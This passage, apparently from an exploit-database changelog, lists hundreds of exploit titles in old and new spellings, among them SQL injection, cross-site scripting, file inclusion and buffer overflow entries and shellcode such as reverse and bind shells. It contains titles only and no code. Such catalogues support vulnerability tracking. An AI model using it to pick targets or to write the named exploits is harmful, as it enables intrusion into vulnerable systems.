PHPBB 2.0.x - Authentication Bypass (2) PHPBB 2.0.x - Authentication Bypass (3) phpBB 2.0.x - Authentication Bypass (1) phpBB 2.0.x - Authentication Bypass (2) phpBB 2.0.x - Authentication Bypass (3) PHPCOIN 1.2 - login.php Multiple Parameter Cross-Site Scripting PHPCOIN 1.2 - 'login.php' Multiple Parameter Cross-Site Scripting Multiple Vendor 
Telnet Client - Env_opt_add Heap-Based Buffer Overflow Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow PHPBB 2.0.13 DLMan Pro Module - SQL Injection PHPBB 2.0.13 Linkz Pro Module - SQL Injection phpBB 2.0.13 DLMan Pro Module - SQL Injection phpBB 2.0.13 Linkz Pro Module - SQL Injection PHPBB Photo Album 2.0.53 Module - Album_Cat.php Cross-Site Scripting PHPBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting phpBB Photo Album 2.0.53 Module - Album_Cat.php Cross-Site Scripting phpBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting Joomla S5 Clan Roster com_s5clanroster - 'index.php id parameter'SQL Injection Joomla S5 Clan Roster com_s5clanroster - 'index.php id parameter' SQL Injection PHPBB Remote - mod.php SQL Injection Datenbank Module For PHPBB - Remote mod.php Cross-Site Scripting phpBB Remote - mod.php SQL Injection Datenbank Module For phpBB - Remote mod.php Cross-Site Scripting PHPBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection PHPBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection PHPBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection phpBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection phpBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection RaidenFTPD 2.4 - Unauthorized File Access RaidenFTPd 2.4 - Unauthorized File Access CartWIZ 1.10 - login.asp Redirect Argument Cross-Site Scripting CartWIZ 1.10 - 'login.asp' Redirect Argument Cross-Site Scripting CartWIZ 1.10 - login.asp Message Argument Cross-Site Scripting CartWIZ 1.10 - 'login.asp' Message Argument Cross-Site Scripting PHPBB 2.0.x - profile.php Cross-Site Scripting PHPBB 2.0.x - viewtopic.php Cross-Site Scripting phpBB 2.0.x - profile.php Cross-Site Scripting phpBB 2.0.x - viewtopic.php Cross-Site Scripting Notes Module for PHPBB - SQL Injection Notes Module for phpBB - SQL Injection PHPCOIN 1.2 - login.php PHPcoinsessid Parameter SQL 
Injection PHPCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection CodetoSell ViArt Shop Enterprise 2.1.6 - page.php page Parameter Cross-Site Scripting CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php' page Parameter Cross-Site Scripting PHPBB 2.0.x - URL Tag BBCode.php phpBB 2.0.x - URL Tag BBCode.php Active News Manager - login.asp SQL Injection Active News Manager - 'login.asp' SQL Injection FunkyASP AD Systems 1.1 - login.asp SQL Injection FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack Based Overflow OS4E - login.asp SQL Injection OS4E - 'login.asp' SQL Injection JiRo's Upload System 1.0 - login.asp SQL Injection NEXTWEB - (i)Site login.asp SQL Injection JiRo's Upload System 1.0 - 'login.asp' SQL Injection NEXTWEB - (i)Site 'login.asp' SQL Injection Livingcolor Livingmailing 1.3 - login.asp SQL Injection Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection WWWeb Concepts Events System 1.0 - login.asp SQL Injection WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection Cool Cafe Chat 1.2.1 - login.asp SQL Injection Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection LaGarde StoreFront 5.0 Shopping Cart - login.asp SQL Injection LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection Ipswitch WhatsUp Professional 2005 SP1 - login.asp SQL Injection Ipswitch WhatsUp Professional 2005 SP1 - 'login.asp' SQL Injection Dynamic Biz Website Builder (QuickWeb) 1.0 - login.asp SQL Injection Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' SQL Injection PHPWebsite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal Cuppa CMS - 'alertConfigField.php urlConfig parameter'Remote / Local File Inclusion Cuppa CMS - 'alertConfigField.php urlConfig parameter' Remote / Local File Inclusion VBZoom 1.0/1.11 - login.php UserID Parameter 
Cross-Site Scripting VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting PHP Lite Calendar Express 2.2 - login.php cid Parameter SQL Injection PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection ATutor 1.5.1 - login.php course Parameter Cross-Site Scripting ATutor 1.5.1 - 'login.php' course Parameter Cross-Site Scripting Adrenalin Player 2.2.5.3 - '.wax'SEH Buffer Overflow Adrenalin Player 2.2.5.3 - '.wax' SEH Buffer Overflow PHPwcms 1.2.5 -DEV - login.php form_lang Parameter Traversal Arbitrary File Access PHPwcms 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access AVS Media Player 4.1.11.100 - '.ac3'Denial of Service AVS Media Player 4.1.11.100 - '.ac3' Denial of Service Adrenalin Player 2.2.5.3 - '.wvx'SEH Buffer Overflow Adrenalin Player 2.2.5.3 - '.wvx' SEH Buffer Overflow WinAmp 5.63 - Stack-based Buffer Overflow WinAmp 5.63 - Stack Based Buffer Overflow PHPX 3.5.x - Admin login.php SQL Injection PHPX 3.5.x - Admin 'login.php' SQL Injection DRZES Hms 3.2 - login.php Cross-Site Scripting DRZES Hms 3.2 - 'login.php' Cross-Site Scripting PortalApp 3.3/4.0 - login.asp Cross-Site Scripting SiteEnable 3.3 - login.asp Cross-Site Scripting IntranetApp 3.3 - login.asp ret_page Parameter Cross-Site Scripting PortalApp 3.3/4.0 - 'login.asp' Cross-Site Scripting SiteEnable 3.3 - 'login.asp' Cross-Site Scripting IntranetApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting ProjectApp 3.3 - login.asp ret_page Parameter Cross-Site Scripting ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting VbsEdit 5.9.3 - '.smi'Buffer Overflow VbsEdit 5.9.3 - '.smi' Buffer Overflow Artweaver 3.1.5 - '.awd'Buffer Overflow Artweaver 3.1.5 - '.awd' Buffer Overflow XnView 2.03 - '.pct'Buffer Overflow XnView 2.03 - '.pct' Buffer Overflow aoblogger 2.3 - login.php username Field SQL Injection aoblogger 2.3 - 'login.php' username Field SQL Injection WebspotBlogging 3.0 - login.php SQL Injection WebspotBlogging 
3.0 - 'login.php' SQL Injection miniBloggie 1.0 - login.php SQL Injection miniBloggie 1.0 - 'login.php' SQL Injection ASPThai Forums 8.0 - login.asp SQL Injection ASPThai Forums 8.0 - 'login.asp' SQL Injection Windows RT ARM - Bind Shell (Port 4444) shellcode Windows RT ARM - Bind Shell (Port 4444) Shellcode Virtual Hosting Control System 2.2/2.4 - login.php check_login() Function Authentication Bypass Virtual Hosting Control System 2.2/2.4 - 'login.php' check_login() Function Authentication Bypass Siteframe Beaumont 5.0.1/5.0.2 - page.php HTML Injection Siteframe Beaumont 5.0.1/5.0.2 - 'page.php' HTML Injection Ginkgo CMS - 'index.php rang parameter'SQL Injection Ginkgo CMS - 'index.php rang parameter' SQL Injection Game-Panel 2.6 - login.php Cross-Site Scripting Game-Panel 2.6 - 'login.php' Cross-Site Scripting QwikiWiki 1.4/1.5 - login.php Multiple Parameter Cross-Site Scripting QwikiWiki 1.4/1.5 - 'login.php' Multiple Parameter Cross-Site Scripting PHPWebsite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection PHPWebsite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection PhxContacts 0.93 - login.php Cross-Site Scripting PhxContacts 0.93 - 'login.php' Cross-Site Scripting MLMAuction Script - 'gallery.php id parameter'SQL Injection MLMAuction Script - 'gallery.php id parameter' SQL Injection RedCMS 0.1 - login.php Multiple Parameter SQL Injection RedCMS 0.1 - 'login.php' Multiple Parameter SQL Injection ShopWeezle 2.0 - login.php itemID Parameter SQL Injection ShopWeezle 2.0 - 'login.php' itemID Parameter SQL Injection ContentBoxx - login.php Cross-Site Scripting ContentBoxx - 'login.php' Cross-Site Scripting PHPBB Chart Mod 1.1 - charts.php id Parameter SQL Injection phpBB Chart Mod 1.1 - charts.php id Parameter SQL Injection PHPBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion phpBB Knowledge Base 2.0.2 - Mod 
KB_constants.php Remote File Inclusion JSBoard 2.0.10/2.0.11 - login.php Cross-Site Scripting JSBoard 2.0.10/2.0.11 - 'login.php' Cross-Site Scripting CyberBuild - login.asp SessionID Parameter SQL Injection CyberBuild - 'login.asp' SessionID Parameter SQL Injection CyberBuild - login.asp SessionID Parameter Cross-Site Scripting CyberBuild - 'login.asp' SessionID Parameter Cross-Site Scripting PHPBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting PHPBB 2.0.20 - Unauthorized HTTP Proxy phpBB 2.0.20 - Unauthorized HTTP Proxy PHPBB 2.0.x - template.php Remote File Inclusion phpBB 2.0.x - template.php Remote File Inclusion PHPBB - BBRSS.php Remote File Inclusion RahnemaCo - page.php Remote File Inclusion phpBB - BBRSS.php Remote File Inclusion RahnemaCo - 'page.php' Remote File Inclusion BlueDragon Server 6.2.1 - '.cfm'Denial of Service BlueDragon Server 6.2.1 - '.cfm' Denial of Service MyMail 1.0 - login.php Cross-Site Scripting MyMail 1.0 - 'login.php' Cross-Site Scripting Woltlab Burning Board FLVideo Addon - 'video.php value parameter'SQL Injection Woltlab Burning Board FLVideo Addon - 'video.php value parameter' SQL Injection PHPBB 1.2.4 For Mambo - Multiple Remote File Inclusion phpBB 1.2.4 For Mambo - Multiple Remote File Inclusion PHPbb-auction 1.x - auction_room.php ar Parameter SQL Injection PHPbb-auction 1.x - auction_store.php u Parameter SQL Injection phpBB-auction 1.x - auction_room.php ar Parameter SQL Injection phpBB-auction 1.x - auction_store.php u Parameter SQL Injection Linux/x86 - Multi-Egghunter shellcode Linux/x86 - Multi-Egghunter Shellcode Jamroom 3.0.16 - login.php Cross-Site Scripting Jamroom 3.0.16 - 'login.php' Cross-Site Scripting DCP-Portal 6.0 - login.php username Parameter SQL Injection DCP-Portal 6.0 - 'login.php' username Parameter SQL Injection PhpBB XS 0.58 - Multiple Remote File Inclusion phpBB XS 0.58 - Multiple Remote File Inclusion AckerTodo 4.2 - 
login.php Multiple SQL Injection AckerTodo 4.2 - 'login.php' Multiple SQL Injection PHPWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion phpWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion PHPBB Add Name Module - Not_Mem.php Remote File Inclusion IcoFX 2.5.0.0 - '.ico'Buffer Overflow phpBB Add Name Module - Not_Mem.php Remote File Inclusion IcoFX 2.5.0.0 - '.ico' Buffer Overflow Evandor Easy notesManager 0.0.1 - login.php username Parameter SQL Injection Evandor Easy notesManager 0.0.1 - 'login.php' username Parameter SQL Injection AIOCP 1.3.x - cp_forum_view.php Multiple Parameter Cross-Site Scripting AIOCP 1.3.x - cp_dpage.php choosed_language Parameter Cross-Site Scripting AIOCP 1.3.x - cp_show_ec_products.php order_field Parameter Cross-Site Scripting AIOCP 1.3.x - cp_users_online.php order_field Parameter Cross-Site Scripting AIOCP 1.3.x - cp_links_search.php orderdir Parameter Cross-Site Scripting AIOCP 1.3.x - /admin/code/index.php load_page Parameter Remote File Inclusion AIOCP 1.3.x - cp_dpage.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_news.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_forum_view.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_edit_user.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_newsletter.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_links.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_contact_us.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_show_ec_products.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_login.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_users_online.php order_field Parameter SQL Injection AIOCP 1.3.x - cp_codice_fiscale.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_links_search.php orderdir Parameter SQL Injection AIOCP 1.3.x - cp_dpage.php Full Path Disclosure AIOCP 1.3.x - cp_show_ec_products.php Full 
Path Disclosure AIOCP 1.3.x - cp_show_page_help.php Full Path Disclosure AIOCP 1.3.x - 'cp_forum_view.php' Multiple Parameter Cross-Site Scripting Windows x86 - Persistent Reverse Shell TCP (494 Bytes) AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_show_ec_products.php' order_field Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_users_online.php order_field Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter Cross-Site Scripting AIOCP 1.3.x - '/admin/code/index.php' load_page Parameter Remote File Inclusion AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_news.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_forum_view.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_edit_user.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_newsletter.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_links.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_contact_us.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_show_ec_products.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_login.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure INFINICART - login.asp Multiple Parameter Cross-Site Scripting INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path'] Multiple Remote File Inclusion Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion SIAP CMS - login.asp SQL Injection SIAP CMS - 'login.asp' SQL Injection AppIntellect 
SpotLight CRM - login.asp SQL Injection AppIntellect SpotLight CRM - 'login.asp' SQL Injection DMXReady Secure Login Manager 1.0 - login.asp sent Parameter SQL Injection DMXReady Secure Login Manager 1.0 - 'login.asp' sent Parameter SQL Injection PHPBB 2.0.21 - privmsg.php HTML Injection phpBB 2.0.21 - privmsg.php HTML Injection Indexu 5.0/5.3 - login.php error_msg Parameter Cross-Site Scripting Indexu 5.0/5.3 - 'login.php' error_msg Parameter Cross-Site Scripting myBloggie 2.1.5 - login.php PATH_INFO Parameter Cross-Site Scripting myBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting Avira Secure Backup 1.0.0.1 Build 3616 - '.reg'Buffer Overflow Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow Boilsoft RM TO MP3 Converter 1.72 - Crash PoC '.wav' Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC Tyger Bug Tracking System 1.1.3 - login.php PATH_INFO Parameter Cross-Site Scripting Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting Horde Framework 3.1.3 - login.php Cross-Site Scripting Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting PHPStats 0.1.9 - Multiple SQL Injections PHPStats 0.1.9 - PHP-Stats-options.php Remote Code Execution phpStats 0.1.9 - Multiple SQL Injections phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution Free File Hosting System 1.1 - login.php AD_BODY_TEMP Parameter Remote File Inclusion Free File Hosting System 1.1 - 'login.php' AD_BODY_TEMP Parameter Remote File Inclusion DeskPro 2.0.1 - login.php HTML Injection DeskPro 2.0.1 - 'login.php' HTML Injection plesk 8.1.1 - login.php3 Directory Traversal plesk 8.1.1 - 'login.php3' Directory Traversal Ahhp Portal - page.php Multiple Remote File Inclusion Ahhp Portal - 'page.php' Multiple Remote File Inclusion Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion Campsite 2.6.1 - ' 
LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion Campsite 2.6.1 - ' LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion PHPPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting Maia Mailguard 1.0.2 - login.php Multiple Local File Inclusion Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusion Nukedit 4.9.x - login.asp Cross-Site Scripting Nukedit 4.9.x - 'login.asp' Cross-Site Scripting Pay Roll Time Sheet and Punch Card Application With Web UI - login.asp SQL Injection Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp'Version Attribute Buffer Overflow RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow PHPGedView 4.1 - login.php Cross-Site Scripting PHPGedView 4.1 - 'login.php' Cross-Site Scripting E-Smart Cart 1.0 - login.asp SQL Injection AkkyWareHOUSE 7-zip32.dll 4.42 - Heap-Based Buffer Overflow E-Smart Cart 1.0 - 'login.asp' SQL Injection AkkyWareHOUSE 7-zip32.dll 4.42 - Heap Based Buffer Overflow SWSoft Plesk 8.2 - login.php3 PLESKSESSID Cookie SQL Injection SWSoft Plesk 8.2 - 'login.php3' PLESKSESSID Cookie SQL Injection AfterLogic MailBee WebMail Pro 3.x - login.php mode Parameter Cross-Site Scripting AfterLogic MailBee WebMail Pro 3.x - 'login.php' mode Parameter Cross-Site Scripting Miro Broadcast Machine 0.9.9 - login.php Cross-Site Scripting Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting JiRo's Banner System 2.0 - login.asp Multiple SQL Injection JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection WinUAE 1.4.4 - 'zfile.c' Stack-Based Buffer Overflow WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 - ActiveX Control Buffer Overflow Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow MuPDF 1.3 - Stack-based Buffer 
Overflow in xps_parse_color() MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color() Android Web Browser - GIF File Heap-Based Buffer Overflow Android Web Browser - GIF File Heap Based Buffer Overflow NCH Software Express Burn Plus 4.68 - '.EBP'Project File Buffer Overflow NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow PHPstats 0.1_alpha - 'PHPstats.php' Cross-Site Scripting phpStats 0.1_alpha - 'phpStats.php' Cross-Site Scripting Publish-It 3.6d - '.pui'SEH Buffer Overflow Publish-It 3.6d - '.pui' SEH Buffer Overflow LeadTools Multimedia 15 - 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities PHPBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion LeadTools Multimedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion PHPBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion EsContacts 1.0 - login.php msg Parameter Cross-Site Scripting EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting NASA Ames Research Center BigView 1.8 - '.PNM'Stack-Based Buffer Overflow NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow PHP Ticket System Beta 1 - 'get_all_created_by_user.php id parameter'SQL Injection PHP Ticket System Beta 1 - 'get_all_created_by_user.php id parameter' SQL Injection VCDGear 3.50 - '.cue'Stack Buffer Overflow VCDGear 3.50 - '.cue' Stack Buffer Overflow FaName 1.0 - page.php name Parameter Cross-Site Scripting FaName 1.0 - 'page.php' name Parameter Cross-Site Scripting TGS Content Management 0.3.2r2 - login.php Multiple Parameter Cross-Site Scripting TGS Content Management 0.3.2r2 - 'login.php' Multiple Parameter Cross-Site Scripting Claroline 1.8.9 - PHPbb/newtopic.php URL Cross-Site Scripting Claroline 1.8.9 - PHPbb/reply.php URL Cross-Site Scripting Claroline 1.8.9 - PHPbb/viewtopic.php URL 
Cross-Site Scripting Claroline 1.8.9 - phpBB/newtopic.php URL Cross-Site Scripting Claroline 1.8.9 - phpBB/reply.php URL Cross-Site Scripting Claroline 1.8.9 - phpBB/viewtopic.php URL Cross-Site Scripting Trixbox - 'endpoint_aastra.php mac parameter'Remote Code Injection Trixbox - 'endpoint_aastra.php mac parameter' Remote Code Injection Free Download Manager - Stack-based Buffer Overflow Free Download Manager - Stack Based Buffer Overflow XRms 1.99.2 - login.php target Parameter Cross-Site Scripting XRms 1.99.2 - 'login.php' target Parameter Cross-Site Scripting Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service Microsoft DebugDiag 1.0 - ' CrashHangExt.dll' ActiveX Control Remote Denial of Service PHPWebSite 0.9.3 - 'links.php' SQL Injection phpWebSite 0.9.3 - 'links.php' SQL Injection Easyedit CMS - page.php intPageID Parameter SQL Injection Easyedit CMS - 'page.php' intPageID Parameter SQL Injection aMSN - '.ctt'Remote Denial of Service aMSN - '.ctt' Remote Denial of Service 68 Classifieds 4.1 - login.php goto Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting ProFTPD 1.3 - 'mod_sql' Username SQL Injection ProFTPd 1.3 - 'mod_sql' Username SQL Injection LinPHA 1.3.2/1.3.3 - login.php Cross-Site Scripting LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting Recover Data for Novell Netware 1.0 - '.sav'Remote Denial of Service Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service J. River Media Jukebox 12 - '.mp3'Remote Heap Buffer Overflow J. 
River Media Jukebox 12 - '.mp3' Remote Heap Buffer Overflow Invision Power Board 3.0.3 - '.txt'MIME-Type Cross-Site Scripting Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting OpenOffice 3.1 - '.csv'Remote Denial of Service OpenOffice 3.1 - '.csv' Remote Denial of Service OpenOffice 3.1 - '.slk'NULL Pointer Dereference Remote Denial of Service OpenOffice 3.1 - '.slk' NULL Pointer Dereference Remote Denial of Service BS.Player 2.51 - '.mp3'Buffer Overflow BS.Player 2.51 - '.mp3' Buffer Overflow netKar PRO 1.1 - '.nkuser'File Creation NULL Pointer Denial Of Service netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Aqua Real Screensaver - '.ar'Buffer Overflow Aqua Real Screensaver - '.ar' Buffer Overflow Mthree Development MP3 to WAV Decoder - '.mp3'Remote Buffer Overflow Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow Sonique 2.0 - '.xpl'Remote Stack-Based Buffer Overflow Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow Property Watch - login.php redirect Parameter Cross-Site Scripting Property Watch - 'login.php' redirect Parameter Cross-Site Scripting Xilisoft Video Converter 3.1.8.0720b - '.ogg'Buffer Overflow Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow Mulitple Wordpress Themes - 'admin-ajax.php img parameter'Arbitrary File Download Mulitple Wordpress Themes - 'admin-ajax.php img parameter' Arbitrary File Download Crystal Player 1.98 - '.mls'Buffer Overflow Crystal Player 1.98 - '.mls' Buffer Overflow Wordpress Acento Theme - 'view-pdf.php file parameter'Arbitrary File Download Wordpress Acento Theme - 'view-pdf.php file parameter' Arbitrary File Download GreenBrowser - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution GreenBrowser - 'RSRC32.dll' DLL Loading Arbitrary Code Execution DragDropCart - login.php redirect Parameter Cross-Site Scripting DragDropCart - 'login.php' redirect Parameter Cross-Site Scripting Microsoft Bluetooth Personal Area Networking - 
'BthPan.sys'Privilege Escalation Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Privilege Escalation WordPress RB Agency Plugin 2.4.7 - Local File Disclosure Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax'Buffer Overflow/Denial of Service EIP Overwrite Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite Wireshark 1.4.3 - '.pcap'Memory Corruption Wireshark 1.4.3 - '.pcap' Memory Corruption Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax'SEH Buffer Overflow Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' SEH Buffer Overflow KMPlayer 2.9.3.1214 - '.ksf'Remote Buffer Overflow DivX Player 6.x - '.dps'Remote Buffer Overflow KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow DivX Player 6.x - '.dps' Remote Buffer Overflow VLC Media Player 1.0.5 - '.ape'Denial of Service VLC Media Player 1.0.5 - '.ape' Denial of Service RealPlayer 11 - '.rmp'Remote Buffer Overflow RealPlayer 11 - '.rmp' Remote Buffer Overflow Advantech AdamView 4.30.003 - '.gni'SEH Buffer Overflow Advantech AdamView 4.30.003 - '.gni' SEH Buffer Overflow FLVPlayer4Free 2.9 - '.fp4f'Remote Buffer Overflow FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow eXPert PDF 7.0.880.0 - '.pj'Heab-based Buffer Overflow eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow BlueVoda Website Builder 11 - '.bvp' File Stack-Based Buffer Overflow BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow PHPWebSite 1.7.1 - 'upload.php' Arbitrary File Upload phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution PHPWebSite 1.7.1 - 'mod.php' SQL Injection phpWebSite 1.7.1 - 'mod.php' SQL Injection Linux/x86 - custom execve-shellcode Encoder/Decoder Linux/x86 - custom execve-Shellcode Encoder/Decoder ProFTPd 1.3.5 (mod_copy) - Remote Command Execution ProFTPd 1.3.5 - (mod_copy) Remote Command 
Execution ProFTPD 1.3.5 - Mod_Copy Command Execution ProFTPd 1.3.5 - 'Mod_Copy' Command Execution Linux/x86 - Download & Execute shellcode Linux/x86 - Download & Execute Shellcode Adobe Flash - Heap-Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec Adobe Flash - Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File Adobe Flash - Heap Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File Valhala Honeypot 1.8 - Stack-Based Buffer Overflow Valhala Honeypot 1.8 - Stack Based Buffer Overflow Microsoft Office 2007 - Malformed Document Stack-Based Buffer Overflow Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass WebKit Cross-Site Scripting Filter - ' Cross-Site ScriptingAuditor.cpp' Security Bypass Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow Mpxplay Multimedia Commander 2.00a - .m3u Stack Based Buffer Overflow Linux/x86-64 - /bin/sh shellcode Linux/x86-64 - /bin/sh Shellcode Last PassBroker 3.2.16 - Stack-Based Buffer Overflow Last PassBroker 3.2.16 - Stack Based Buffer Overflow C2 WebResource - 'File' Parameter Cross-Site Scripting C2 WebResource - ' File' Parameter Cross-Site Scripting SmallFTPD - Unspecified Denial of Service SmallFTPd - Unspecified Denial of Service VLC 2.2.1 libvlccore - '.mp3'Stack Overflow VLC 2.2.1 libvlccore - '.mp3' Stack Overflow FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read FBZX 2.10 - Local Stack-Based Buffer Overflow FBZX 2.10 - Local Stack Based Buffer Overflow TACK 1.07 - Local 
